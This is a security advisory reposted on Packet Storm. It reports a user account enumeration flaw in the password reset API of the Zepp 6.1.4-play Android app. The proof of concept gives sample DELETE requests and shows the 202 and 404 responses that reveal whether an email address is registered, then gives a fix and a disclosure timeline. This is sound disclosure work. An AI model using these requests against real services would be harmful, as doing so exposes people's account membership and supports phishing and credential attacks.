exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Zepp 6.1.4-play User Account Enumeration

Zepp 6.1.4-play User Account Enumeration
Posted Apr 27, 2022
Authored by Karima Hebbal | Site trovent.io

Zepp version 6.1.4-play suffers from a user account enumeration flaw in the password reset function.

tags | exploit
SHA-256 | dd2dc79c277146022bd841a6e3457f872018f219fbac2d90f8f9b9a7a5da6c35

Zepp 6.1.4-play User Account Enumeration

Change Mirror Download
# Trovent Security Advisory 2108-02 #
#####################################


User account enumeration in password reset function
###################################################


Overview
########

Advisory ID: TRSA-2108-02
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2108-02
Affected product: Zepp Android mobile application (com.huami.watch.hmwatchmanager)
Tested versions: Zepp 6.1.4-play
Vendor: Huami Inc., https://www.zepp.com
Credits: Trovent Security GmbH, Karima Hebbal


Detailed description
####################

Zepp is a mobile application to collect health information from Zepp or Amazfit
devices.
Trovent Security GmbH discovered a user account enumeration vulnerability in
the password reset function of the Zepp mobile application.
This vulnerability allows to check if a user with a specific email address is
registered or not.

Severity: Medium
CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CWE ID: CWE-204
CVE ID: N/A


Proof of concept
################

Sample HTTP request sent with a registered email address:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DELETE /registrations/ptesttest33%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2
Host: api-user.huami.com
App_name: com.huami.midong
Accept-Language: en-US
X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)
Accept-Encoding: gzip, deflate
Content-Length: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The server response to a valid email address:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HTTP/2 202 Accepted
Date: Mon, 30 Aug 2021 12:38:52 GMT
Content-Type: application/json
Content-Length: 39
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers

"HuaMi Oauth / User Registration 2.0.2"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Sample HTTP request sent with a non-registered email address:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DELETE /registrations/false%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2
Host: api-user.huami.com
App_name: com.huami.midong
Accept-Language: en-US
X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)
Accept-Encoding: gzip, deflate
Content-Length: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The server response to an invalid email address:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HTTP/2 404 Not Found
Date: Mon, 30 Aug 2021 12:40:08 GMT
Content-Type: application/json
Content-Length: 39
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers

"HuaMi Oauth / User Registration 2.0.2"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Solution / Workaround
#####################

Ensure the application returns a consistent message for both existent and
non-existent accounts during the password reset process.


History
#######

2021-08-30: Vulnerability found & advisory created
2021-09-24: Vendor contacted
2021-10-25: Vendor contacted again
2021-11-18: Vendor contacted again
2022-04-27: No reaction from vendor, advisory published
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close